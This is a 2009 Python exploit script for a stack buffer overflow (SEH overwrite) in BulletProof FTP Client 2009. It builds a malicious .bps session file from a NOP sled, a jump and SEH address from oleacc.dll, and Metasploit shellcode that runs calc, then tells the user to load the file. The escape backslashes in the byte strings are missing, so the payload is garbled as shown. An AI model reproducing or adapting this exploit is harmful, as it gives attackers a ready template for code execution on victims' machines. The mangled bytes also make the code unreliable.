#!/usr/bin/python
#[*] Bug : 	    BulletProof FTP Client 2009 (.bps) Buffer Overflow Exploit (SEH)
#[*] Credits :      Stack
#[*] Tested on :    Xp sp2 (fr)
#[*] Exploited by : His0k4
#[*] Greetings :    All friends & muslims HaCkErs (DZ),snakespc.com,secdz.com
#[*] Chi3arona houa :        Serra7 merra7,koulchi mderra7 :D
#[*] translate by Cyb3r-1st: esse7 embe7 embou :D

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode=(
"x33xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x71"
"x4fxd8x8dx83xebxfcxe2xf4x8dxa7x9cx8dx71x4fx53xc8"
"x4dxc4xa4x88x09x4ex37x06x3ex57x53xd2x51x4ex33xc4"
"xfax7bx53x8cx9fx7ex18x14xddxcbx18xf9x76x8ex12x80"
"x70x8dx33x79x4ax1bxfcx89x04xaax53xd2x55x4ex33xeb"
"xfax43x93x06x2ex53xd9x66xfax53x53x8cx9axc6x84xa9"
"x75x8cxe9x4dx15xc4x98xbdxf4x8fxa0x81xfax0fxd4x06"
"x01x53x75x06x19x47x33x84xfaxcfx68x8dx71x4fx53xe5"
"x4dx10xe9x7bx11x19x51x75xf2x8fxa3xddx19xbfx52x89"
"x2ex27x40x73xfbx41x8fx72x96x2cxb9xe1x12x4fxd8x8d")

header1=(
"x54x68x69x73x20x69x73x20x61x20x42x75x6cx6cx65x74"
"x50x72x6fx6fx66x20x46x54x50x20x43x6cx69x65x6ex74"
"x20x53x65x73x73x69x6fx6ex2dx46x69x6cx65x20x61x6e"
"x64x20x73x68x6fx75x6cx64x20x6ex6fx74x20x62x65x20"
"x6dx6fx64x69x66x69x65x64x20x64x69x72x65x63x74x6c"
"x79x2ex0dx0a")

exploit =  "passwords.hotmail.com"
exploit += "x90"*68
exploit += "x74x06x90x90" #oplaa!
exploit += "x98x6AxBFx74" #oleacc.dll (xp sp2)
exploit += shellcode

header2=(
"x0ax32x31x0dx0ax41x42x41x42x43x0dx0ax62x70x68x67x71"
"x64x6ex62x6ax6ax67x61x65x62x0dx0ax63x3ax5cx0dx0a"
"x2fx0dx0a")

vuln = header1 + exploit + header2

try:
    out_file = open("sploit.bps",'w')
    out_file.write(vuln)
    out_file.close()
    print "nSession file created!nnNow Go to: file>Load BP Session then chose it and clic Connectn"
except:
    print "Error!"

# www.Syue.com [2009-04-13]